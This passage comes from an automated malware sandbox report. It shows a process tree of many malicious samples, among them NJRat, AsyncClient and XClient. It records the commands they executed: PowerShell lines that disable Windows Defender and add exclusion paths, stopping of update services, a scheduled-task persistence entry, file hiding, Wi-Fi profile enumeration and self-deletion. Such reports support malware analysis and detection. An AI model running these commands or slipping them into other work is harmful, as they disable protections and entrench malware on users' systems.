        PID:3268
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:3324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:3296
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:3340
  - - C:\Users\Admin\AppData\Local\Temp\740521061.exe
      C:\Users\Admin\AppData\Local\Temp\740521061.exe
      4⤵
      PID:3336
  - - C:\Users\Admin\AppData\Local\Temp\531813918.exe
      C:\Users\Admin\AppData\Local\Temp\531813918.exe
      4⤵
      PID:3236
- C:\Users\Admin\AppData\Local\Temp\Files\UNICO-Venta3401005.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\UNICO-Venta3401005.exe"
  2⤵
  PID:3916
- - C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe
    "C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe"
    3⤵
    PID:636
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Archivos de programa\UNICO - Ventas\ODBC.cmd" "
    3⤵
    PID:3144
- C:\Users\Admin\AppData\Local\Temp\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe"
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe"
    3⤵
    - Views/modifies file attributes
    PID:5988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6132
- C:\Users\Admin\AppData\Local\Temp\Files\update.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
  2⤵
  PID:5512
- - C:\Users\Admin\AppData\Local\Temp\hrhfhqzmkw.exe
    "C:\Users\Admin\AppData\Local\Temp\hrhfhqzmkw.exe" "C:\Users\Admin\AppData\Local\Temp\ejnupdogkf.exe" "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
    3⤵
    PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
      4⤵
      PID:4604
- - C:\Users\Admin\AppData\Local\Temp\ufhwknpxdb.exe
    C:\Users\Admin\AppData\Local\Temp\ufhwknpxdb.exe
    3⤵
    PID:5800
  - - C:\Windows\System32\cmd.exe
      /c sc config msdtc obj= LocalSystem
      4⤵
      PID:5764
    - - C:\Windows\system32\sc.exe
        
        sc config msdtc obj= LocalSystem
        5⤵
        Launches sc.exe
        
        PID:3960
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\MGYHX8yv.bat"
      4⤵
      PID:4340
  - - C:\Windows\System32\bindsvc.exe
      "C:\Windows\System32\bindsvc.exe"
      4⤵
      PID:4388
- C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
  2⤵
  PID:5704
- - C:\Windows\sysppvrdnvs.exe
    C:\Windows\sysppvrdnvs.exe
    3⤵
    PID:4832
- C:\Users\Admin\AppData\Local\Temp\Files\2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\2.exe"
  2⤵
  PID:2980
- C:\Users\Admin\AppData\Local\Temp\Files\stail.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\stail.exe"
  2⤵
  PID:3180
- - C:\Users\Admin\AppData\Local\Temp\is-GTPOU.tmp\stail.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-GTPOU.tmp\stail.tmp" /SL5="$20350,5977381,56832,C:\Users\Admin\AppData\Local\Temp\Files\stail.exe"
    3⤵
    PID:1584
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" pause hd_video_converter_fox_125
      4⤵
      PID:5744
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause hd_video_converter_fox_125
        5⤵
        
        PID:4600
  - - C:\Users\Admin\AppData\Local\HD Video Converter Fox 1.2.5\hdvideoconverterfox125.exe
      "C:\Users\Admin\AppData\Local\HD Video Converter Fox 1.2.5\hdvideoconverterfox125.exe" -i
      4⤵
      PID:4828
- C:\Users\Admin\AppData\Local\Temp\Files\valid.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\valid.exe"
  2⤵
  PID:6904
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\N2P23.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\N2P23.exe
    3⤵
    PID:1376
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y9Q63.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y9Q63.exe
      4⤵
      PID:6084
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Z45e8.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Z45e8.exe
        5⤵
        
        PID:6808
      - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        6⤵
        
        PID:6296
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2s3369.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2s3369.exe
        5⤵
        
        PID:8708
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P43S.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P43S.exe
      4⤵
      PID:8836
- C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
  2⤵
  PID:6712
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "payload.bat"
    3⤵
    PID:5992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
      4⤵
      PID:4400
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_PointingDevice get PNPDeviceID /value
        5⤵
        
        PID:4824
    - - C:\Windows\system32\find.exe
        
        find "PNPDeviceID"
        5⤵
        
        PID:4316
- C:\Users\Admin\AppData\Local\Temp\Files\o.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
  2⤵
  PID:5384
- C:\Users\Admin\AppData\Local\Temp\Files\cookie250.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cookie250.exe"
  2⤵
  PID:2096
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  PID:8364
- C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
  2⤵
  PID:7380
- C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"
  2⤵
  PID:5124
- C:\Users\Admin\AppData\Local\Temp\Files\Extension2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Extension2.exe"
  2⤵
  PID:9168

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" shell32.dll,Options_RunDLL 7
1⤵
PID:2588

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4519758,0x7fef4519768,0x7fef4519778
  2⤵
  PID:848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:2
  2⤵
  PID:1932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:8
  2⤵
  PID:2992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:8
  2⤵
  PID:2952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2332 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:1
  2⤵
  PID:2816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2348 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1028 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:2
  2⤵
  PID:660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2876 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:1
  2⤵
  PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4060 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:8
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4052 --field-trial-handle=1312,i,3850323961273586508,6886681722316941071,131072 /prefetch:1
  2⤵
  PID:3004

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\Files\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4363463463464363463463463.exe"
1⤵
PID:2816
- C:\Users\Admin\AppData\Local\Temp\Files\Files\AsyncClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\AsyncClient.exe"
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
    3⤵
    PID:1392
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp14C8.tmp.bat""
    3⤵
    PID:2480
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3168
  - - C:\Users\Admin\AppData\Local\Temp\update.exe
      "C:\Users\Admin\AppData\Local\Temp\update.exe"
      4⤵
      PID:3388
- C:\Users\Admin\AppData\Local\Temp\Files\Files\build2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\build2.exe"
  2⤵
  PID:2532
- C:\Users\Admin\AppData\Local\Temp\Files\Files\m.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\m.exe"
  2⤵
  PID:816
- - C:\Windows\sysvplervcs.exe
    C:\Windows\sysvplervcs.exe
    3⤵
    PID:3120
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:3356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3428
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      PID:3364
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3476
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3504
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3520
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:3564
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        5⤵
        Launches sc.exe
        
        PID:3600
  - - C:\Users\Admin\AppData\Local\Temp\3356627530.exe
      C:\Users\Admin\AppData\Local\Temp\3356627530.exe
      4⤵
      PID:3208
  - - C:\Users\Admin\AppData\Local\Temp\448222121.exe
      C:\Users\Admin\AppData\Local\Temp\448222121.exe
      4⤵
      PID:4040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:3444
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:3156
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:3484
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:4044
  - - C:\Users\Admin\AppData\Local\Temp\2776117982.exe
      C:\Users\Admin\AppData\Local\Temp\2776117982.exe
      4⤵
      PID:3648
  - - C:\Users\Admin\AppData\Local\Temp\3173912773.exe
      C:\Users\Admin\AppData\Local\Temp\3173912773.exe
      4⤵
      PID:3316
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Setup2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Setup2.exe"
  2⤵
  PID:3532
- C:\Users\Admin\AppData\Local\Temp\Files\Files\tstory.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\tstory.exe"
  2⤵
  PID:3476
- C:\Users\Admin\AppData\Local\Temp\Files\Files\o.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\o.exe"
  2⤵
  PID:3312
- C:\Users\Admin\AppData\Local\Temp\Files\Files\stail.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\stail.exe"
  2⤵
  PID:3368
- - C:\Users\Admin\AppData\Local\Temp\is-H6NFM.tmp\stail.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-H6NFM.tmp\stail.tmp" /SL5="$20328,5276717,721408,C:\Users\Admin\AppData\Local\Temp\Files\Files\stail.exe"
    3⤵
    PID:4004
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" pause avidenta_11131
      4⤵
      PID:4076
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause avidenta_11131
        5⤵
        
        PID:3480
  - - C:\Users\Admin\AppData\Local\Avidenta 2.7.7\avidenta.exe
      "C:\Users\Admin\AppData\Local\Avidenta 2.7.7\avidenta.exe" -i
      4⤵
      PID:3672
- C:\Users\Admin\AppData\Local\Temp\Files\Files\zts.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\zts.exe"
  2⤵
  PID:3928
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 168
    3⤵
    - Program crash
    PID:2188
- C:\Users\Admin\AppData\Local\Temp\Files\Files\nxmr.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\nxmr.exe"
  2⤵
  PID:3400
- C:\Users\Admin\AppData\Local\Temp\Files\Files\t2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\t2.exe"
  2⤵
  PID:4024
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Final.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Final.exe"
  2⤵
  PID:3952
- - C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    3⤵
    PID:3732
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4488
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:5688
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5772
    - - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:5780
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      4⤵
      PID:6072
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4660
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        
        PID:4684
    - - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        5⤵
        
        PID:4692
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe"
      4⤵
      PID:992
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4044
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:3500
- C:\Users\Admin\AppData\Local\Temp\Files\Files\mountain-pasture.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\mountain-pasture.exe"
  2⤵
  PID:3700
- C:\Users\Admin\AppData\Local\Temp\Files\Files\pp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\pp.exe"
  2⤵
  PID:8520
- C:\Users\Admin\AppData\Local\Temp\Files\Files\NJRat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\NJRat.exe"
  2⤵
  PID:6728
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Amogus.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Amogus.exe"
  2⤵
  PID:8008
- C:\Users\Admin\AppData\Local\Temp\Files\Files\evetbeta.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\evetbeta.exe"
  2⤵
  PID:7972
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Vhpcde.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Vhpcde.exe"
  2⤵
  PID:7496
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:9944
- C:\Users\Admin\AppData\Local\Temp\Files\Files\rat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\rat.exe"
  2⤵
  PID:4408
- - C:\Users\Admin\AppData\Local\Temp\Files\Files\rat.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Files\rat.exe"
    3⤵
    PID:2580

C:\Users\Admin\AppData\Local\Temp\Files\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4363463463464363463463463.exe"
1⤵
PID:920
- C:\Users\Admin\AppData\Local\Temp\Files\Files\cookie250.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\cookie250.exe"
  2⤵
  PID:2392
- C:\Users\Admin\AppData\Local\Temp\Files\Files\s.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\s.exe"
  2⤵
  PID:3756
- C:\Users\Admin\AppData\Local\Temp\Files\Files\ardara.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\ardara.exe"
  2⤵
  PID:3504
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:3232
- C:\Users\Admin\AppData\Local\Temp\Files\Files\PsExec64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\PsExec64.exe"
  2⤵
  PID:2672
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Windows.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Windows.exe"
  2⤵
  PID:5400
- C:\Users\Admin\AppData\Local\Temp\Files\Files\frap.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\frap.exe"
  2⤵
  PID:5480
- C:\Users\Admin\AppData\Local\Temp\Files\Files\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\XClient.exe"
  2⤵
  PID:5516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4004
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Session.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Session.exe"
  2⤵
  PID:5608
- C:\Users\Admin\AppData\Local\Temp\Files\Files\AI2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\AI2.exe"
  2⤵
  PID:5932
- C:\Users\Admin\AppData\Local\Temp\Files\Files\tpeinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\tpeinf.exe"
  2⤵
  PID:3944
- - C:\Users\Admin\sysppvrdnvs.exe
    C:\Users\Admin\sysppvrdnvs.exe
    3⤵
    PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6836
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      PID:2832
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1296
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:5660
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2084
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:5284
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        5⤵
        Launches sc.exe
        
        PID:6668
  - - C:\Users\Admin\AppData\Local\Temp\2278419978.exe
      C:\Users\Admin\AppData\Local\Temp\2278419978.exe
      4⤵
      PID:5140
  - - C:\Users\Admin\AppData\Local\Temp\971913041.exe
      C:\Users\Admin\AppData\Local\Temp\971913041.exe
      4⤵
      PID:7224
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:9124
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:2216
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:7688
  - - C:\Users\Admin\AppData\Local\Temp\27188037.exe
      C:\Users\Admin\AppData\Local\Temp\27188037.exe
      4⤵
      PID:8808
  - - C:\Users\Admin\AppData\Local\Temp\309111759.exe
      C:\Users\Admin\AppData\Local\Temp\309111759.exe
      4⤵
      PID:5900
- C:\Users\Admin\AppData\Local\Temp\Files\Files\System.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\System.exe"
  2⤵
  PID:1408
- - C:\Users\Admin\AppData\Local\Temp\Files\Files\._cache_System.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Files\._cache_System.exe"
    3⤵
    PID:7108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\._cache_System.exe'
      4⤵
